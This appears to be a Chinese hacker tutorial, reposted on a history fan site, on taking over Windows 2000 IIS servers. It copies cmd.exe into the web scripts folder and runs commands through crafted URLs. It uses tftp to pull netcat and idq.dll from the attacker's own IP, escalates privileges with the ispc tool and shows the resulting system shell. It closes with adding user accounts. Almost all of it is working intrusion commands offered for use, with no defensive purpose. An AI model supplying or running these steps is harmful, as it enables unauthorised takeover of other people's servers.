首页 | 手机版 | 三国演义 | 三国志 | 史将 | 背景 | 藏书阁
首页 -> 精彩文章 -> 鸟入侵之用iis远程命令取得系统控制权

鸟入侵之用iis远程命令取得系统控制权

作者永恒国度 标签黑客 阅读次数:126
用流光扫描到的黑色主机(什么是黑色主机,请参见流光帮助),可以利用iis远程  

命令取得系统控制权!  
除了流光外,还需要snake的ispc(IIS权限提升工具,还没有的可到我的主页下载)  
和tftp32。  
用鼠标单击黑色主机-》连接,出现iis远程命令行工具,然后执行如下命令:  
copy c:\wint\system32\cmd.exe c:\inetpub\scripts\fuck.exe  
此时在浏览器中输入:  
http://192.168.0.1/scripts/fuck.exe?/c+dir+c:\  
如果返回对方c:\目录!那么就可以搞定了!  
接下来可以有如下方法:  
1、把nc.exe拷贝上去执行:  
http://192.168.0.1/scripts/fuck.exe?/c+tftp -i 你的IP GET nc.exe  

c:\\inetpub\\scripts\\nc.exe  

http://192.168.0.1/scripts/fuck.exe?/c+c:\inetpub\scripts\nc.exe(执行nc)  
此时可以telnet到99,但添加用户的时候很显然权限不够!  

2、拷贝冰河服务端上去执行,然后…………  

在这里我们不用以上方法。  
首先在iis远程命令行中输入  
dir c:\idq.dll/s  
如果找到文件就  
copy c:\……\idq.dll c:\inetpub\scripts  
如果没有找到,直接  
运行tftp32把idq.dll上传,在浏览器中上传  
http://192.168.0.1/scripts/fuck.exe?/c+tftp -i 你的IP GET idq.dll  

c:\\inetpub\\scripts\\idq.dll  
成功后运行ispc.exe  
ispc 192.168.0.1/scripts/idq.dll  
接着出现  
Start to connect to the server...  
We Got It!  
Please Press Some <Return> to Enter Shell....  

Microsoft Windows 2000 [Version 5.00.2195]  
(C) 版权所有 1985-2000 Microsoft Corp.  

C:\WINNT\system32>  
哈哈进来了!@这就可以添加用户了!然后就随便你了!   


浙ICP备06020153号-1